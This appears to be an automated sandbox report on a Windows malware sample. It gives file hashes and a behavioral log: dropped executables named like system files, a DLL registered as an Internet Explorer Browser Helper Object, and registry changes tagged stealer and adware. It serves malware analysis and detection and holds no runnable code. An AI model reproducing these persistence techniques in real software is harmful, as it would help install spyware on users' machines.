SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarCB64.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8df00f33e4c169844aa4b57e3354b3dc
SHA1 c08cca631cbee8f25db2f6652ceaa454f2e0c644
SHA256 c533b5e3b544ff6f948fa773c81b34bd3d5b75ecad28712c33830d3d426e2eaa
SHA512 b7700c8f6a4650adbff4f4b819f624c91b024f8ccb663125f38a2b209827ced3a9db97d9a5cd83f12ecec0e9d7723601f4b247a3addb5c65ddd2b38657d25062

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 affc4a2b17a2a95c19c7dc7d09158a65
SHA1 7bd639b169127e0a77aae6f7a3bd5839211a805a
SHA256 61a650ba31a77fb73e3ab303c17fe99441b2a0d52a4e05effac4ce8643db5e58
SHA512 53f03a291ab07d5bbf31fad9217a9c9b8a8384f9ca5ec8a63ec728a8885bea764364fb869d15f0ddb75677c5a9eabf31c3ec4be93c429a0753876e325b5cd4b6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f1da51153bacc38dc1fe1709f8b4b0a9
SHA1 b3484f2c328b8a9ec1b4a83fc8d72969693ba279
SHA256 704fb55a8a884d97992602862286b0511b6dd83830461ee4daa4bddacf4ffcc5
SHA512 806b5c0ac61bcd4bd989a9e25b0c244545a0bb709c78923d47e4afac6159c9575fe1cc8ffbda027ad3daee56e9320f0a108f8e0a9fec2c7af19cadd4fbbd1eb0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56158f3b2d7294a0f3be86391cc64cb1
SHA1 216c8f660500bbf6ff38cccf905b52e403c9dd47
SHA256 3e50f1f7f6d26722bcea53324d78c6a36d02a1a6ab17604d31197761fa304c0b
SHA512 c4f1e21133a2bdc59bbac6a0c521a6a9102ad5abbca6a2e0499e1ec125092f281d9d634b9fda7a0b6b5a2c4a60a5ea1720c98cdf1c76a2aa5fc708bd15f67e84

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 749d7a32da84a13be906d553f2466375
SHA1 18cfb7aeebac2df675f682f9fb358d83683a5bb6
SHA256 72ce61e6943586691577f25b5766048ba6df3d42f45213bc4a0b1a29944a5a7c
SHA512 1db5d328ea5076cda90fcd321f6c12be757aff048ae99ae1fd2268f5b66d31b097a4d80f728f82a9a27418c4c9e2ef9dbf50d9f18d448d643fb899a35d10f489

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6e0175d98f0b8083f4dead5c9b44844b
SHA1 fb3b8f6f7ce17db0d8771caa01d5dcb3ed2b46e0
SHA256 93c5abc98d76daa51aca6b7520f77b8fb821aed5744b6a67df2f804ef6fa49cf
SHA512 e70fefcc8d65978e9264b7be74fee6e8fe652a604d5db17fe34a129127c372a97f47e27479aae514566a0393c1b5c16160333d113d9cf527bebdf4b6b38b7933

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f66c445693656d2cd4a5130fa552a759
SHA1 7654eebab0f31546f1f1b8d027936574dc546c0a
SHA256 829ec9059a0a99bd289742b12cd5ed656e05299744ecba56c55d1d38d9633984
SHA512 474a7b3fed8754710b54f00cc6c24c50b12cb3ada8ce7269ea710d87fc3ecb283717675ed1ad2985d440dc065a4b448fc35e764a5409e37e560d0483de09d680

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e6ee25fb2f07aa6503b659d9962ed721
SHA1 b35bc835425192974b0867cca27accd56787e8c7
SHA256 c60d9b98d407c2d633a1f5489333452a34cda8f306b67cc3edc59eb6889704c1
SHA512 7abcaff9a29d0ca87aa3aaac35b2d32993e9a497f561df16d03530f0448d2bc76f5323aca4109ec8f66ae0689beddc7bb17999ca09488ec17910c0a3cc3e08c3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 64e9d184b730f43e56686d635d3a5d56
SHA1 e797fe62bf7bbb338682c64c5c076813bbb02918
SHA256 a94a5f035ce253f4a27fc85ecd1d35eb3319fbcafc1407cbd6fbc81c258ab671
SHA512 764ac022d03017222577d126be7bff53f8b18af868cbc19863da47c681617d5a2935e27efa2726089e237bd2fb434d8d484eac44ffa481ad8a16ace910271e61

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 347d53118157913966fca607a689d494
SHA1 8676a5de2dbfb910cde99af860255dff024077a8
SHA256 f031bb3e024399117c029f670a01ca2c893957d426568f14afd5101d166b0fcf
SHA512 e4f98aec823e84de049222a50a5a686a7b9013c95c734bb0f11da755aeb864bef87a4eff28a8eeb58877e15a23cbf39e9115f67a1fd899123139c5ffa6ae5386

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2057d319aaea8dffdd6538f65f046213
SHA1 2f3347f969acc40329146f6eb65d9f7f1dfd0f1f
SHA256 d6ac44486a630b434cc2c983a9bfc1405b286258acdeb685dcb630f18bc2856b
SHA512 d34c839a4f25e2f8af5c88eb083ebdda93b33c6fa5ad03bb35709aaddb51ea0a83bfb1cfe22e7b7d6260181f4027f4e08a5f04c7f8e1a6ceee1b68e98198c10f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 396075906327654fe2a3473eaedcd27b
SHA1 37ef3b084ce4af7b98f8b469ae43f458458a7e92
SHA256 9e0a197f9536a31c0093b5f8788d079adec742fdd04cace3c85d9d9a53b3464e
SHA512 11b56adddcb2bc25fcfe1d2d9c028e4494d3666ac89db308ead3c38311a04e87c196c4cfe60a434121f6d84e31d28477f1a51da6254c16154edfd6b02cab2542

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a209a570c3b9c0b7ed521be9a3b6af36
SHA1 1860df1ff9a840a182b3e1a7112ea736d35248cc
SHA256 42a04cceb8bca30a3d270a5543e8910b9ff84fd1dff2d3833c2d970d0fe3fecd
SHA512 427b61ce50968194fbee4bad5d6d67fb5a11cc9347eba28c174c11b08ae91ea714d1b499cedfce7cb094079cb45415c1808a046d31a7cedf676a9b8299732597

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ad793f51c86fd125cd72b7ca45208e0d
SHA1 1d3cbf1158c36212f79a1d138acb0744225c10d9
SHA256 81a891114d26168e18a67cbbe04edf4277c361a612a2ce6ecad3738a02069c66
SHA512 c0c0054369cd43dc78d0033e3cd845997a7968efbe9e7c81f8d179f5eb5f73d3e7fa99b9d1c7853ad42797a467fd0deae706a2e3f80ded352d03d3f751bb203f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6834d1db00de053bb604d2a7dd411d74
SHA1 ad441f034be69de57285d9f995090ff17c302bcd
SHA256 5c0dcf31f6000e74e69fdd324a9fd710ab9406108a197a450ebabb71aa8740e1
SHA512 4ae2845a40bda48a497826c881e0d0ba771e6d7e95d32c5e67484f2a7427ac1f18355d1294d2ca78264def54d0f9a90f4fda1483a9b0e96b0a45d46a7be20128

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cb61b62cdb4e34b22e40ce4de2f0af8f
SHA1 da324c56bbbc728e3d1aa4b66d9ac1cdbff915e1
SHA256 83e66633bb8417843168af332b1c4fb4cb122381e0bc26a748c80e2011b4f5f2
SHA512 13b0a27b78815447b8d622d6f383bd782afc8d4bc78dfdcc5064665e7eac6c8aae00d4cb43d5c6f53effe927ef3180eb1568b7d46e9700cb979d894b66a166fc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 186ecbcdf3264ca6a5b378c2c699ab29
SHA1 5964564aa8a7dac1e525e32c9d7e5df33771a0f7
SHA256 c14898591617ee67e9fb499c4263f86e5441f4fa28610112167863de286001bf
SHA512 e89b64a739ff8a40c559a9a4cd97dcb8b3d2df196a569a944dc77d82f15b12bba9b068a118a41fa2dc4083974b1f3ca6da4f69acb893dfce3e266115c11d95b3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7645e3574b98ef622fbdd94953a00780
SHA1 b5163ae57a1e21553bc173e3e9af0d44137ee000
SHA256 9a6367165ccb9691333fd0de340c49c17c61f2a124aa3b9edd894bef51856f69
SHA512 38969e935ddf8586c4276f51e8e94e8efb8ae22c8be916e8aa5a7ee2b37d55d4af02b6bde93013467cf11730b0774e4012066d944e9ac8f8431bbd85106677a5

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-21 17:18

Reported

2024-03-21 17:21

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\WINDOWS\SysWOW64\4875\Winupdate.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe N/A
N/A N/A C:\WINDOWS\SysWOW64\4875\Winspss.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FF71FF86-04AC-4cb2-A35A-1262BF791A01} C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\WINDOWS\SysWOW64\4875\Winspss.exe C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\PowerHacker_Charm.dll C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\PowerHacker.ini C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\Windows\SysWOW64\psjm.dll C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{0C597D78-E7A7-11EE-87B8-628714877227} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000055176c4ced34542856d0f29947515a500000000020000000000106600000001000020000000eae00ac8c3dc764d8f86ebc1420027cdef75a392656c00240d8289e6b9b1e787000000000e800000000200002000000003cda4bcebcb9995683ee803b914a1be874d4ea2f0d35f7feb2a91c91ac752292000000084278da60d67cbf27faf0145e9d9f99678934ba283e2d2893ac5f829d5e2609940000000198e5a7b9d8f297da5cabe2b803d8e7c5734214dd890e2e878dcebd31e4edfffad1e46f3c4a5e7848ba80edb7c84bfc0fb5fd9d5a55067c5f7b5333f8865f603 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31095731" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3821346590" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3821346590" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31095731" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31095731" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "417806489" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3780721503" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3780721503" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31095731" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31095731" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 402281cfb37bda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3821033987" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3821033987" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31095731" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\ = "nop1 Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\ = "{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\ = "nop1 Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\ = "{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ProgID\ = "new.myb.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ = "noep Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\HELPDIR\ = "C:\\Windows\\System32" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CurVer\ = "new.myb.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\TypeLib\ = "{5399FC70-D920-4d82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\ = "s 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\psjm.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\CLSID\ = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CLSID\ = "{FF71FF86-04AC-4cb2-A35A-1262BF791A01}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01} C:\Windows\SysWOW64\regsvr32.exe N/A
